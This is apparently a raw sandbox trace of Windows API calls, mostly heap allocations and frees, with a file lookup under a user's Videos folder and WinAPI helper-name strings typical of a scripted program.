1 [0108.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0108.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca430 [0108.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0108.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0108.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0108.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0108.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0108.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0108.622] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0108.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0108.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0108.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0108.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0108.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0108.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0108.622] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0108.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0108.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0108.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0108.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0108.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0108.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.623] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\recAT1.mkv", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x120192a0, ftCreationTime.dwHighDateTime=0x1d5e27d, ftLastAccessTime.dwLowDateTime=0xe49685f0, ftLastAccessTime.dwHighDateTime=0x1d5e597, ftLastWriteTime.dwLowDateTime=0xe49685f0, ftLastWriteTime.dwHighDateTime=0x1d5e597, nFileSizeHigh=0x0, nFileSizeLow=0x10503, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="recAT1.mkv", cAlternateFileName="")) returned 0x41ac780 [0108.623] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0108.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0108.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0108.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0108.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0108.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0108.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0108.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0108.624] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0108.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0108.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0108.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27c0 [0108.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0108.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0108.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0108.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0108.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0108.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0108.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0108.625] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0108.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0108.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0108.625] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0108.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0108.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27d0 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0108.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28c0 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0108.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28d0 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0108.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0108.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0108.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0108.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0108.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0108.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0108.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0108.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0108.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0108.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0108.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0108.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0108.628] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0108.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0108.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0108.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0108.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0108.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0108.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0108.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0108.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0108.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0108.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0108.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0108.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0108.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0108.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0108.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0108.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0108.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0108.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0108.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0108.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0108.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0108.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0108.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0108.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0108.632] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0108.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0108.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0108.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0108.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0108.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0108.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0108.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0108.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0108.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0108.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0108.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0108.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0108.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0108.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0108.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0108.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0108.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0108.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0108.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0108.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0108.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0108.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0108.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0108.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0108.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0108.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.634] 